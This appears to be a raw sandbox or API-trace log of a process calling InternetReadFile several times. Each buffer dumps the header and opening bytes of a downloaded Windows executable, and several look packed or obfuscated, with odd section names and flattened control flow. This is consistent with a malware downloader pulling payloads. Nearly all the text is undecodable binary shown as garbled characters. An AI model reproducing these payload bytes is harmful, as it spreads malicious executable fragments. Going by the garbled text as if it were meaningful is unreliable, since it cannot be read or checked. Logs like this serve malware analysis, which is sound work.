´+F¿D$52;D$|X‹|$ƒÿ}e¶T$€úƒš¯Ï¡à+F€@£¼+F¶Â£,F‰Ê€=Ô+F†„†‹ ¨+Fù·§r:„Žéœ‹D$4ƒð&f£†+F‹|$ƒÿ|›¿ô+F¯Ø‰Œ+F¸‹\$ ûÓxtóÓx¡¼+F1Ò÷ó£ð+F¶T$€ú‚fÿÿÿ¡,F‹T$€=Ô+F†…zÿÿÿ‹ ¬+F œ+F‰ ¨+Fù·§r:u‹ ð+F ä+Ff‰ ,F¿Ê; ¸+F µh£´+FÇD$ƒD$4% +F• ߀ Ô+FÃi,F>\ô£,FƒÄ ^_[]ÃÌÌÌÌÌÌÌÌÌÌÌUSWVƒì‹ ø+FùþÔu ¿]f»]ë)¸M^–ù +F£ü+Fǰ+F·¤+FiØTãÿÿ1ÿÇÜ+FëI‘ ¶¨+F4i¢È+F¡à+F‰D$9ȉL$}8f¸·f+Ø+Ff£,F¶Ô+FiÀëI‰$‹ ¬+F…Ét¸FT1Ò÷ù‰Æëf¸þԉ$f½ô(¾þÿYA뾸wåª÷-¸+F‰Õ‰ÐÁèÁýſ͡˜+FÀ‰L$ 9 ì+F¹tAttEÈ·ˆ+F9ä+FrÇä+F׉Ⱥ¢’+F¡œ+F;Ø+F‰t$sG‹5˜+Fºñ0µ‰ð÷ê‰Óó‰ØÁèÁëÃǬ+F ‰=ü+FÇD$4¡ ,F‰D$=:bt(ë^‹=ü+FÇD$?ÿ·gás$¡ ,F‰D$=:bu8‹t$0f…ítN‹D$™÷|$ ëH·+Fº2§Ê)‰œ+F¡ ,F‰D$=:btȶÔ+F5U£”+F¹+t
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL£wLgà  "&è+%@@p(ÜÕ'‰è˜!d`(D V(@° .text©  `.rdata˜@@@.data@?à@Àss0‡  `ss18°@Àss2—À˜ `.rsrcD `( ž@@œÆ'&9(úÎ# €éR h…¡9Åd$Ý*çh"S_˜D$f3óÁl$¸öT$fÿÎÀt$æÁd$fö7dfÿÆèh²°7¸h)k?fò7dÀD$¦ƒ ˆh= *Lf‰hƒ` (é´ þ¨U,®nŽ»¹¶~IÄËOBDj›óë?«?|$&ÀUHE‰ÁýeT ž»cHØç»^Ï*Òêˆà±²hQÏQ/Ü¯ÃÕɬÛN8UTÀ’~Ý$\˧!‘2°ôÀ've_> Å_#úª…ÙX$¡Ÿ vÞêE^ ÿ›…%¿ GÊ8‘’³B:Y_vèä•2憞?«Ç§ÆÖ(Bù×ÀT8¾VÑ·À[èœãjcÃðP/sšæ`‚#yåÐhS¹•㎠ue¤÷՝ è7`<êïȦÈebú.ÊäñÒ2;TÉ6ËwäM˜ŽhJRÞ ÃÝe3§²áÙ8_÷œzÛ†Y5“««nG‰²Ò‚kŠÀ(Û=ˆ€!‹ª 2¶Ã¨üóÙd•ß'§¬ õŽœ°qïtŸûƒeSLTê­õ#)ý„ éNj` OœâN*ˆ¸ŸÙººöÁ<@xàы„™(7^8‹`„À ‰[ºÀºl8Ñ÷}À%Í>•4 ž¿To™þV=ÉÐA=§€ÊJ{=_$yUé(‹`…DÆû¸Üv˜LtŸ{ ‘‡ùæ¡›tŸûÔt[vÔÚæéE.z“lÑ÷.›“æfW•´Ge×¼ZXÙ-(ûVa§_$6}ñtŸ{¯v@›Ì)ÏÆ´jôNü®õ@üý]JâåÉsçL„³ŽU ½ð³[霠óÑÈS‚ÂTh¥HÕ0¸‰»nÎùQ.rדZ§K,¿{U§zéUžÿÊèÿWhÕîÙ¿ÂT5x¡ØxcÓ̐=IÈ%éà®:³”<Cؑý)ê‹ê˜ÓºtI’mb¯0joüô zo`Éþ™’wLž‹V“¢ )Ñ $ ž“;8˜‹ßz›C/ÁÌûˆFÑç¯þÄÌ{š£†Ž*lØ]t“ÌûþëFg:UFýÓéuˆêáéå.»ò9U Äަ‹L䈎ƒ½$ÔíoÀs~V2hóˆoj½XÆÉñÙ7‚¿¥t‰dÀþj_°MpAvÞ¥K)K²/[úTEã?·ùúÀLŸû]í«<2z+LŸ{O±º,@ÍÏ[Á°µ€ ¸³` ¦ÁÀáH6‹°MíÕÄè¤üi¬Iš6Š®äxEzµ‚*úÁÃ^*¯[^àٓùý„$s˜£]BÇ36ÕP¨‹Z³`Ýam.¦¥Â[LŸ{_ºü¿éioLŸûä%§{uU[»LŸ{ßP}œ Uóc^öåmÆýÛ·.³.Zß:êˆóUÉôË3Õw’ÉIBã_ၭ¹Ž´LŸûû»%ƒqƒ*Vá˜óÄ &Û†3IÕð(£Ä¨I5´//ÜȘ ù€b>Ì%?úùu’ÄT/ÿ2á׍TÌó[t(±Íåm\"¶·$ܾù1;àÔ ¶þ¬àÑy*ð!ÄT۟ðX#wöŠ/Ê~G‰Üdo¿€Üfòõ3ú;y éð±èé$‚÷’¶ÑfÿÀºø™;ó¸9Žã8é~f‰hŸšŠ¨èŽA»¸ŒXA·ËI‹âQDŽLàþÿ‰‘þQN‹¤þGs§D·”Ìp?úÿN‹´Hs§A‹òA¿ú¸,…NJ‹¬Hs§D‹ÉéÃX¾Rk¨eú§…ù ©SsÒxM`L žHf&‡gØIÊ«d´Ñ„øÀäáúÀpæšWçÖðdUõÊbMì˜%À%GËÊYh´ê/Bœ|$‘³ŠïHÇD$xnÞ8ÿt$Hd$è^ü Žâ6Õ-…ä­{†¢mwªad–žrëÄü?…€ÑùÌ`ÿÆÊ¶¸bU¬ü/¦[‡¹-x™ûg,¯û.û ýp¡,¯{*ëêf=L>ît1ˆójÓP â¹ ØÀ;†½Ã7T¥Û#»2ϐ$.²ï¯Ö/,¯û5‘æå ßÓP„t‹ì“pSiÓP&†ªÍ€<¶3#;,éw¤}K‹¦{ãÒ¤0-…âJI°ÌJÞ6…0©€ø[ÖÙ§ $ΟLׯT»;šRcUÁ„?Ÿ”Àeà•¤ê~{Ðå ©Âý2ye'zËXÅ4L'AÆTrº¿è@+î’/Ê: -¹à@{˔ÈM¦8Ԃ­rtièªúú'Ä"Ê¥WQÆT‡¸‰4Ñ5 FÚÀg|Ì¿ë^:ï ÒãÉRBncm.Á¤‡ŽÁ2Ì6éU>˜ÚdðÉ ÔGеêÐ@¶·ð$8¯G<ÁM«Ø29ÇÇ[X‡a“†#g²W·ßÇ9¯Gn ¬­9k‡®3ÆQøõ–{Tüƒâ{9«ÿWÞñÆPx!èpöôÀ9®‡Q™¬/ãE€Æ[àªÅÅ»/¾Ímb>£×nó"TÀõSmáN£¢>W®ìAfن[’wmqh³¬“¨5AàhéEªx«b`gx þ:[=dcZvb‚âºÇ 鯢:ªÒã}˜}bŽ€Àö^KQñpL/)1ø“x> ç ‹*Ç ,‡-õ p›{àí}^¢$p›ûz„…ᖋ2ëÑp›{ž>»¡ìPÚc "ŒUéýrz½X¸‰ã~ÞÑy ™±}£oc`AàÄlj*Ɛdyû*ÈT`ˆQ-u­œê~;£À`X ¾Ú;ÖVÅ)ʃþ]ëÃPŽa®xuèªV0ÈT}L‚§KäŸËR.ïæß­´“ÇD$‘Ú(ÐÊé“˹„š¿E‹4"f»ÉQH‰L$AŠL"ÀD$ ƒHÁt$ IÒfÁd$ cè“;Ã9rÐjXOU|6-0N Œ†ž] «÷zñ•æ Œº ¡Ÿ; Íq\º ¯Šãi¢l49uña ®,VNe¸ 8$Ë|ãÇ ¹9½Gà ‘Ck8ê· *¬/,K:«H ½ g¯â@esJóÑ#ä Ô –!#-vg5û#ºßf_ —I  N §òÙ ;‡Qg ÖÀsŸúšÙv¹÷+Øþçn­¦ˆ²
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd† WPþgð" BdH<@@` $ (  ¸)0 Ô °Ý(Ðu@X' .textF@B `.rdata\÷`øJ@@.datax<` B @À.pdata¸)  *V @@.B6ûÐ € `.gxfgà „ @@.retplneŒ ¤ .tls  ¦ @À_RDATAô ¨ @@.relocÔ 0 ª @B.jssv@ v´ @À.jssvÀv*@ÀAWAVAUATVWUSHì¸H‹¦S H1àH‰„$°‹-™c ‹5—c }ÿ¯ý‰û÷Ӂ累$.‰ÝåKPÛÑ ýõJPÛуãþ ë‰Ý÷Ձå⠋ãôto ëóôto”D$ZA”ÀA•Áƒþ ŸÃƒþ œD$[œÀDˀóD0ÀA‰ØA À0ØDÀ½ÀçÄ{à†Dè‰l$T½Ù ñDè‰l$P½ÒtD¸¡£l-Dè‰l$L½{£œ/Dè‰l$H½A„Í,¸ðÖ)Dè‰l$D½áD  Dè‰l$@½$ v¯¸Ð¨-Dè‰l$<‰T$8ºhñ¡fDЉT$4ºÚۺ̸ZɍDЉT$(ºû × DЉT$0AºF­9ð¸‡&äíDDк-‚]HDЉT$,A½¼áf¸È2cGDDè¸á†ùA¿~ºÙ-A¼>¬ùA‰Á=T€ÏfAùÉKÕߎÉAùØ ñŽáAùá†ùŽ¿Aùá†ù„ÍAùƒgç„D‰ÈAùû × u©‹D$h‹”$9œD$o‹D$(두AùÒtDŽ3Aù»áfޝAùy©z޵AùÀ预 D‰ÈAùy©z…Lÿÿÿ‹D$$‰„$Œ‹D$ ‰„$‹D$,é-ÿÿÿf.„Aù¯¿J«<AùYɍxAù¤{à†„eD‰ÈAùn„…éþÿÿH‹D$p¾8D‰Ú÷ҁâ @¬D‰Ø%0 ЉÁó 5îoÏÿD‰ÚòÓ°p¬D!ډþ÷։ýõÓ°p¬!î!ý‰×÷×A‰ÀAàŸòãÃ0` D à øçŸòâçp` ú1Ú÷РЉó÷Ӊê÷҉߁çË¹ïæ4ðF þ Ӂâ˹ïå4ðF Õ1õ÷Ó ë‰Â÷ҁâ\¶Å%£pI: ЉÚ÷ҁâ\¶Åã£pI: Ó1ÃiӕéÑ[D‹„$Œ‰Ó÷ӉØ%Á½âï>€B ‰փöòËÛS<‰Ø÷ÐD‰ÅõÛS<D!ÅAÈ$ê¬ÃD‰Ç÷ׁÊ¢ˆ€âǶˆæS, ցãǶˆ% H$C Ø1ð‰ê÷ÒD‰Ãã÷iŸç@8 ßA Ёâ÷iŸå–`ú Õ1ýA÷ÐA è‰Â÷ҁâ%ÛOˆ%Ú$°w ÐD‰Â÷ҁâ%ÛOˆAàÚ$°wA ÐA1À¸Àé¢éQýÿÿAù@„Í,ŸAùïÖ)ÎAùU€Ï„ÕD‰ÈAù“Æ…ýÿÿH‹D$xHƒø¸uõÿ*ºÊKÕßLÂE1öéûüÿÿAù¿çÄAùÊKÕß„D‰ÈAù‡&äí…Ñüÿÿ¸-‚]HéÇüÿÿAù,‚]H­AùÒtD„ëD‰ÈAùÈ2cG…üÿÿH‰Œ$˜H‹„$˜H‰„$ ¸¯ê=ވš'~)=߈š'tU=~ºÙ-„Ë=‚–9Tuàé¹f.„=¯ê„+=M[ب„F=>¬ùu³H‹„$˜¸ßˆš'=ވš'¦ëÍH‹¼$˜‹k^ hÿ¯è‰è÷ЉÁãÂå‹Ìå=t3 ݁õ<t31è…è•Àƒ=A^ ŸÃ‰ÚÂ0ÃA‰ÙA0ф۸>¬ù»M[بEÃH‹7„ÒAEÄH‰´$¨E„ÉDÃ=ވš'(ÿÿÿéLÿÿÿ‹ò] ‹=ð] Xÿ¯Ø‰Ý÷Ձ㼭@â‰è%CR¿ Ø5BR¿ƒåþ ŃýÿA•Á”Àƒÿ œÂƒÿ ŸÃ ØD ʉØD ÈD0ËÉØ0н߈š'AEì„۸߈š'EńÒDÅ=ވš'¦þÿÿéÊþÿÿHƒy¸‚–9TAGÇH‹”$ =ވš'€þÿÿé¤þÿÿH‹„$¨¸‚–9T=ވš'cþÿÿé‡þÿÿAù>^±æAù°¿J«„%D‰ÈAù$ v¯…­úÿÿ‹D$@é¤úÿÿAùϨ-ÙAùA„Í,„D‰ÈAù¡£l-…zúÿÿ‹„$‹„$‹„$‹„$‹„$H‹D$`‹„$Œ‹„$Œ‹„$Œ‹„$‹„$‹„$‹„$‹„$¸{£œ/éúÿÿAùÙ ñ„”D‰ÈAù˅Kù…óùÿÿHcD$hHÁàHD$`H‰D$pH‹AH‰ÂH÷ÒH‰ÕHƒåüƒàH èH1ÂH!ÂH‰T$x¸ƒgçé´ùÿÿAù¼áf„„D‰ÈAùF5Nq…—ùÿÿ‹D$HéŽùÿÿAùZɍ„xD‰ÈAùáD  …qùÿÿ‹
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@к´ Í!¸LÍ!This program cannot be run in DOS mode. $é¶ßYˆØŒYˆØŒYˆØŒ3”ÚŒpˆØŒYˆÙŒ[ˆØŒë”ÈŒ[ˆØŒYˆØŒVˆØŒáŽÞŒXˆØŒRichYˆØŒPELª»‹dà  Þ´ÀJ@ðJrû @€[ðoàˆ ÐJ@à.rsrcˆàZ@À.idata ð^@À )`@àixykbadz 0 b@àqbxnipce°J‚ @à.taggant0ÀJ"† @à
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd† Qùhð" „x3@0ìk``<( ¼ T”(&l «@H?À.textš‚„ `.rdatadÀ Œ@@.dataØ(pN@À.pdataT \@@.B8Ÿ À v `.gxfgpЂ@@.retplneŒð˜_RDATAôš@@.reloclœ@B.jssv v¤@À.jssv  v @À.rsrc¼ @@AWAVAUATVWUSHì˜H‹¦`H1àH‰„$‹õl‹-ólxÿ¯ø‰û÷ӁçQem‰Ø%÷®š’ ø5ö®š’ƒãþ Ãûÿ”D$:ƒý œD$;‰T$4I‰Ì¸ÞwAºhÍÅ A»ñdo¾¶ˆÓÆ=­9뎔ëm‹ŒlHÿ¯È‰È÷Љƒâþƒá Ñ÷Ñ Áƒùÿ”Àƒ=kl œÁ0ȉÂöÒ Ê‰Á0фÀ¸gÅe;½D2ÚYEńҺgÅe;D„ÉEÅf.„=­9ëŽ%=»þX^=fÅe;ŽÄ= òu<Ž=òu<„=ÎÍ@„³ =ñàòCu»D‰l$pD‰t$t‹D$L‹L$t9Á¸¹Ì ³¹><â;é«„=çéˆkŽQ=É|tŽ$=É|t„ =üBy„ =Þw…YÿÿÿŠD$:ŠL$;‰Â€ò0ȀñщÂ0ʨ¸övòè½òu<EÅöÁ¹övòèEÁöÂé²=aŠ+P=®9ë„§þÿÿ=½uÍ…þþÿÿH‹D$XHƒø¸¼þX¹›…±LÁE1ÿ=­9ëåþÿÿf.„=¸Ì ³I=±e÷£ŽI=8„–©Ž5=9„–©„Ú =kT&«„ =p ‘­…’þÿÿ¸µ´X’=­9ë~¶éŒþÿÿ=õvòèŽ>=—z«þŽT=˜z«þ„3 =›…±„6 =BZû…Iþÿÿ¸©{@¼=­9ëŽiÿÿÿé?þÿÿ=_E[O=¼þX„Z =D2ÚY…þÿÿ‹ =j‹=;jQÿ¯Ñ‰Ñ÷сáŒ(́âsì×2 ʉсñsì×2ò„(€â·ù€‰ÍåHø ՁõIøƒáþ é‰Ê÷ҁâHMρᷲç0 сñ·²ç0”Á•Àƒÿ œÃƒÿ ŸÂ Ñ ÃˉÙ0ф۸ÎÍ@½µ´X’EńҺÎÍ@éŸ=´´X’==ç°<€„¾ =M…Týÿÿ¸.cÁ‹L$d‰L$,=­9ëŽlþÿÿéBýÿÿ=.cÁ–=¹Ì ³„® =©{@¼…ýÿÿ‹ @i‹=>iQÿ¯Ñ‰Ñ÷сáõ¿A+â @¾Ô ʉՁõ @¾Ôò¤¹â¬¹ ‰éáSF_ø сñRF_øƒåþ ̓ýÿ”À•ƒÿ œÃƒÿ ŸÁÑ0ÉÈ0غïÄ6©¸BZûEЄۉнïÄ6©EńÉEÂ=­9ë޳ýÿÿé‰üÿÿ=²e÷£„6=ïÄ6©…hüÿÿ¸ñàòCE1öD‹l$<=­9뎀ýÿÿéVüÿÿ=gÅe;„ =><â;…5üÿÿHcD$tH‹L$@i •éÑ[‰ÈÁè‰Å÷Չêâ5Lƒàä ЉÊ÷Ò55L ЉÃ÷Ӂâp“×ñál( сñp“×ñ é‰Ê÷҉Ł劚jiãue•– ë ȁኚjiƒâu Ê1Ú÷Ð ÐiȕéÑ[iD$p•éÑ[÷ÐA‰ÅA ÍD‰ê÷Ò1È÷Ð!ȉÁ÷ÑD‰íå^Ї?â¡/xÀ êA ́á^Ї?%¡/xÀ È1ÐA÷ÕA ÅD‹t$tAƒÆ¸ñàòC=­9뎋üÿÿéaûÿÿ=èéˆk„) =¥ˆÆq…@ûÿÿ‹jgHÿ¯È‰È÷Ð%÷݁á€ã" Á‰È5€ã"ñ£4]á«4Ñ]‰ÂâTË.¢ ʁòUË.¢ƒàþ Ѓøÿ”Àƒ="g œÁ0ȉÂöÒ Ê‰Á0фÀ¸É|t½üByEńҺÉ|té²úÿÿ=bŠ+„j =7v7…®úÿÿ‹„$€‹„$€‹„$€‹„$€‹„$€‹„$€‹„$€‹„$€‹„$€‹„$€‹’fHÿ¯È‰È÷Љƒâþƒá Ñ1ȅÈ”Àƒ=tf œÁ0ȉÂöÒ Ê‰Á0фÀ¸EÝô”½p ‘­EńҺEÝô”éúÿÿ=övòè„Ù=¯U#ê…úÿÿH‹D$XHƒø¸½u͹ç°<€LÁ=­9ëŽûÿÿéåùÿÿ=`E[„É =8‘`g…Äùÿÿ‹ îe‹=ìeQÿ¯Ñ‰Ñ÷сá^ ;Xâ¡óħ ʉՁõ¡óħòX"PâøâfՉéá™* сñ™*ƒåþ ̓ýÿ”Á•Àƒÿ œÃƒÿ ŸÂ Ñ ÃˉÑ0ل۸gÅe;½®9ëEńҺgÅe;E‹T$0‰”$€é· =µ´X’„O =EÝô”…ùÿÿ‹„$€‹„$€‹„$€‹„$€‹„$€‹„$€
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $ù\Zî—Zî—Zî—–”_î—–’ìî—–“Kî—Kh”Pî—Kh“Kî—Kh’î—––Sî—Zî–Îî—¢iž[î—¢ih[î—¢i•[î—RichZî—PEd†²Fhð" +´ÖPv@Ð`\ d°àp3ÀÜ `½p ¼@Ѐ.text¨³´ `.rdatab\Ð^¸@@.data¤50@À.pdata3p4.@@.rsrcà°b@@.relocÜ À d@BH‰\$UH¬$0ÿÿÿHìÐWÀD$03ÛH‰\$@H‰\$HA¸H–œHL$0è ¿WÀD$PH‰\$`H‰\$hA¸HpœHL$Pèv¿WÀD$pH‰]€H‰]ˆA¸HLœHL$pèN¿WÀEH‰] H‰]¨A¸H)œHMè(¿WÀE°H‰]ÀH‰]ÈA¸HœHM°è¿WÀEÐH‰]àH‰]èA¸Hå›HMÐèܾWÀEðH‰]H‰]A¸HÛHMðè¶¾WÀEH‰] H‰](A¸H¡›HM萾WÀE0H‰]@H‰]HA¸H›HM0èj¾WÀEPH‰]`H‰]hA¸H]›HMPèD¾WÀEpH‰€H‰ˆA¸H5›HMp辐WÀ…H‰ H‰¨A¸H ›Hè潐WÀ…°H‰ÀH‰ÈA¸HàšH°è´½HD$0H‰D$ H…ÐH‰D$(HT$ H SèlhL ´kº A¸ HL$0èC^H Ø­H‹œ$àHÄÐ]éaÌÌÌH‰\$UH¬$PþÿÿHì°WÀD$03ÛH‰\$@H‰\$HA¸H>šHL$0轐WÀD$PH‰\$`H‰\$hA¸ H šHL$Pèæ¼WÀD$pH‰]€H‰]ˆA¸ HšHL$pè¾¼WÀEH‰] H‰]¨A¸Hñ™HMè˜¼WÀE°H‰]ÀH‰]ÈA¸HיHM°èr¼WÀEÐH‰]àH‰]èA¸H½™HMÐèL¼WÀEðH‰]H‰]A¸H£™HMðè&¼WÀEH‰] H‰](A¸H…™HM輐WÀE0H‰]@H‰]HA¸ Hk™HM0èÚ»WÀEPH‰]`H‰]hA¸HU™HMPè´»WÀEpH‰€H‰ˆA¸H1™HMp舻WÀ…H‰ H‰¨A¸ H ™HèV»WÀ…°H‰ÀH‰ÈA¸Hè˜H°è$»WÀ…ÐH‰àH‰èA¸H˜HÐèòºWÀ…ðH‰H‰A¸Hœ˜HðèÀºWÀ…H‰ H‰(A¸Hz˜H莺WÀ…0H‰@H‰HA¸ HX˜H0è\ºWÀ…PH‰`H‰hA¸H6˜HPè*ºWÀ…pH‰€H‰ˆA¸H ˜Hpèø¹WÀ…H‰ H‰¨A¸ Hâ—HèƹHD$0H‰D$ H…°H‰D$(HT$ H Oè~dL Ægº A¸HL$0èUZH *ªH‹œ$ÀHÄ°]é1]ÌÌÌÌÌH‰\$UH¬$PþÿÿHì°WÀD$03ÛH‰\$@H‰\$HA¸HJ—HL$0è ¹WÀD$PH‰\$`H‰\$hA¸ H(—HL$Pèö¸WÀD$pH‰]€H‰]ˆA¸ H—HL$pèθWÀEH‰] H‰]¨A¸Hù–HMè¨¸WÀE°H‰]ÀH‰]ÈA¸Hã–HM°è‚¸WÀEÐH‰]àH‰]èA¸HɖHMÐè\¸WÀEðH‰]H‰]A¸H«–HMðè6¸WÀEH‰] H‰](A¸H‘–HM踐WÀE0H‰]@H‰]HA¸Hw–HM0è귐WÀEPH‰]`H‰]hA¸H1–HMPèÄ·WÀEpH‰€H‰ˆA¸H-–HMp蘷WÀ…H‰ H‰¨A¸ H –Hèf·WÀ…°H‰ÀH‰ÈA¸Hè•H°è4·WÀ…ÐH‰àH‰èA¸ H¾•HÐ跐WÀ…ðH‰H‰A¸Hœ•HðèжWÀ…H‰ H‰(A¸Hz•H螶WÀ…0H‰@H‰HA¸ HX•H0èl¶WÀ…PH‰`H‰hA¸H2•HPè:¶WÀ…pH‰€H‰ˆA¸H•Hp趐WÀ…H‰ H‰¨A¸ Hâ”HèÖµHD$0H‰D$ H…°H‰D$(HT$ H #KèŽ`L Öcº A¸HL$0èeVH z¦H‹œ$ÀHÄ°]éAYÌHƒì(H ),èDH …¦HƒÄ(é YHƒì(A¹HÓ-E3ÀH Y-èH a¦HƒÄ(éðX@SHƒì ¹èÔéH -H‹Øèu—H¾E3ÀH‹ÓH‰-H z-èµ H f¦HƒÄ [é XH‹­5Læ,L‰§5H…ÒtH‹HcHL‰DPL‹5H‹5H…Òt H‹HcHL‰DPÃÌÌHƒì(H ‘,è\H ¦HƒÄ(é8XH ¦é,XH Q¦é XHƒì(A¹H.E3ÀH ™.蔙H e¦HƒÄ(éðW@SHƒì 3Éè×èH Ð-H‹Øèx–H½E3ÀH‹ÓH‰´-H ­-è¸H m¦H
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $$„2â`å\±`å\±`å\±Ôy­±hå\±Ôy¯±ëå\±Ôy®±må\±àž¡±bå\±àžX°rå\±àž_°jå\±àžY°Yå\±iß±iå\±iÛ±bå\±iÏ±gå\±`å]±Cä\±îžY°Rå\±îž\°aå\±îž£±aå\±îž^°aå\±Rich`å\±PEd†#—@fð" !h8à.@`Á —4ԗP`ã l0ðp À6T€7(ð³@€¼ˆ .textngh `.rdataÄ(€*l@@.data\ç°–@À.pdatal0 2°@@.didat`àâ@À_RDATA\ðæ@@.rsrc`ãäè@@.relocp ð Ì@BH 9¹éŽÌÌÌÌH Éù鸤ÌÌÌÌHƒì(H 5ùèdH ÉeHƒÄ(é¸H Éeé¬ÌÌÌÌHƒì(è̉ájHƒÄ(ÃÌÌÌÌÌÌÌÌÌÌÌÌH éjé”ûÌÌÌÌH ÙeélÌÌÌÌH Ùeé\ÌÌÌÌHƒì(H ­lèØ¦H ÉeHƒÄ(é8H Éeé,ÌÌÌÌH ÉeéÌÌÌÌH Éeé ÌÌÌÌHƒì(H ¥kèTˆH éeHƒÄ(éèH )féÜÌÌÌÌHƒì(H Ål蘀H fHƒÄ(é¸H fé¬ÌÌÌÌH‰\$H‰l$H‰t$WHƒì0H‹ñI‹ØI‹ÈH‹ú3íèhL‹ÀH‹ÓH‹Ïè¯DE H‰.H‹ÐH‰nH‹ÎH‰nH‹Øèž$H‰kH‹ÆH‹t$Pf‰+H‹l$HHÇCH‹\$@HƒÄ0_ÃÌÌÌH‰\$H‰t$WHƒì0H‹ù3öH‹JH‹ÚH;Js!HƒzHAH‰BH‹ÂrH‹fD‰Hf‰tHëE·ÈºDŠÆH‹Ëè"A¸ H‰7H‹ÓH‰wH‹ÏH‰wè$H‰sH‹Çf‰3H‹t$HHÇCH‹\$@HƒÄ0_ÃHƒì(HA'H;Áv'H‹Èè[H‹ÈH…ÀtHƒÀ'HƒààH‰HøHƒÄ(ÃèqfÌèç ÌÌÌH‰\$H‰l$H‰t$WAVAWHƒì I¾þÿÿÿÿÿÿI‹ØL‹úH‹ùM;ƇÌHÇAHƒûsH‰YHÛL‹ÃèS#3öf‰4;é…H‹Ã3öHƒÈI;ÆvH¸ÿÿÿÿÿÿÿH ë.¹ L‹ðH;ÁH¸ÿÿÿÿÿÿÿLBñINH;Èw^HÉHùr èÿÿÿH‹èëH…ÉtèxëïH‹îH‰_I‹×HÛH‰/L‹ÃL‰wH‹ÍèÇ"f‰4+H‹\$@H‹l$HH‹t$PHƒÄ A_A^_Ãèå Ìèc ÌÌÌH…Ò„H‰\$H‰t$WHƒì H¸ÿÿÿÿÿÿÿH‹ñH;ÐwoHHûr H‹Ëè}þÿÿH‹øëH…Ût H‹ËèÛ ëì3ÿH‰>H;H‰~L‹Ã3ÒH‰FH‹ÏèÛ(Hƒd$0H;HL$0H‰FèOH‹\$8H‹t$@HƒÄ _ÃèÖ ÌÌH‰\$WHƒì H‹ÚI‹øH+ÙH‹ÑL‹ÃH‹ÏèÛ!H;H‹\$0HƒÄ _ÃH‹ÄH‰XH‰hH‰pH‰x ATAVAWHƒì H»þÿÿÿÿÿÿM‹ùL‹òH‹ùH;Ó‡H‹iHƒÊE3äH;ÓwH‹ÍH‹ÃHÑéH+ÁH;èvH¸ÿÿÿÿÿÿÿH ë1H)H‹ÚH;ÐHBØH¸ÿÿÿÿÿÿÿHKH;ȇ HÉHùr èLýÿÿH‹ðëH…Étè­ ëïI‹ôH‰_I‹×K6L‰wL‹ÃH‹Îèþ fD‰$3Hƒýr1H‹HmHúrL‹AøHƒÂ'I+ÈHAøHƒøw3I‹ÈèŽ H‰7H‹ÇH‹\$@H‹l$HH‹t$PH‹|$XHƒÄ A_A^A\ÃèØ ÌèVcÌèP ÌÌÌÌH‰\$H‰l$H‰t$WATAUAVAWHƒì L‹qH»þÿÿÿÿÿÿH‹ÃM‹éI+ÆH‹ñH;‚@H‹iM<I‹×E3ÀHƒÊH;ÓwH‹ÍH‹ÃHÑéH+ÁH;èvH¸ÿÿÿÿÿÿÿH ë1H)H‹ÚH;ÐHBØH¸ÿÿÿÿÿÿÿHKH;ȇéHÉHùr èûûÿÿH‹øëH…Étè\ ëïI‹øH‹D$pO6LðL‰~H‰^M$8H‹ÏL<HƒýrSH‹H‹Óè—M‹ÇI‹ÕI‹Ìè‰3ÀHmfB‰wHúrH‹KøHƒÂ'H+ÙHCøHƒøwMH‹ÙH‹Ëè ëH‹ÖèGM‹ÇI‹ÕI‹Ìè93ÀfB‰wH‰>H‹ÆH‹\$PH‹l$XH‹t$`HƒÄ A_A^A]A\_ÃèÎaÌèÈÌè>ÌÌH‰\$H‰l$H‰t$WATAUAVAWHƒì L‹qH¿þÿÿÿÿÿÿH‹ÇE·ùI+ÆH‹ñH;‚H‹iM$I‹ÔE3íHƒÊH;×wH‹ÍH‹ÇHÑéH+ÁH;èvH¸ÿÿÿÿÿÿÿH ë1H)H‹úH;ÐHBøH¸ÿÿÿÿÿÿÿHOH;ȇÇHÉHùr ènúÿÿH‹ØëH…ÉtèÏ ëïI‹ÝMöL‰fH‰~M‹ÆH‹ËHƒýrIH‹>H‹×èHmfE‰<fE‰lHúrH‹OøHƒÂ'H+ùHGøHƒøwCH‹ùH‹Ïè¨ ëH‹ÖèÒfE‰<fE‰lH‰H‹ÆH‹\$PH‹l$XH‹t$`HƒÄ A_A^A]A\_Ãèc`Ìè]ÌèÓÌÌÌ@SHƒì H‹ÙH‹ÂH ŗWÀH‰ HSHHèsHÀ—H‰H‹ÃHƒÄ [Ã@SHƒì H‹ÙH‹ÂH ‰—WÀH‰ HSHHè7HœH‰H‹ÃHƒÄ [ÃHƒaHLpH‰AHù›H‰H‹ÁÃÌÌ@SHƒì H‹ÙH‹ÂH -—WÀH‰ HSHHèÛH‹ÃHƒÄ [ÃÌÌ@SHƒì H‹H…ÛtIH‹ H…ÉtAH‹SH+ÑHÑúHÒHúrL‹AøHƒÂ'I+ÈHAøHƒøwI‹ÈèGHƒ#HƒcHƒcHƒÄ [Ãè&_ÌÌé»ÌÌÌ@SHƒì H‹ÙH‹ H…ÉtAH‹SH+ÑHÑúHÒHúrL‹AøHƒÂ'I+ÈHAøHƒøwI‹ÈèàHƒ#HƒcHƒcHƒÄ [Ãè¿^ÌÌÌH9–H‰HƒÁéÌÌÌÌÌH‰\$WHƒì H–H‹ùH‰‹ÚHƒÁèZöÃt ºH‹ÏèxH‹\$0H‹ÇHƒÄ _ÃÌÌ@USVWAUAVAWH¬$PÿÿÿHì°H‹³£H3ÄH‰… I‹ÙI‹ðL‹úL‹ñE3íL‰mfoÖnóEfD‰m¿M…É„ÊL‰màWÀóEðH‹Ëèf^L‹ÀH‹ÓHMàèw÷ÿÿE3ÀHUàHM`è–öÿÿL‹ÃH‹ÐHM@è öÿÿE3ÀH‹ÐHM èvöÿÿH‹ÐHƒxrH‹L‹@HMèÐHM è%HM@èHM`èH‹UøHƒúr2HUH‹MàH‹ÁH;×rHƒÂ'H‹IøH+ÁHƒÀøHƒø‡èè@¹£è H‹ØL‰màWÀóEðH‹Èè]L‹ÀH‹ÓHMàè öÿÿE3À
request_handle: 0x00cc000c
1 1 0

InternetReadFile

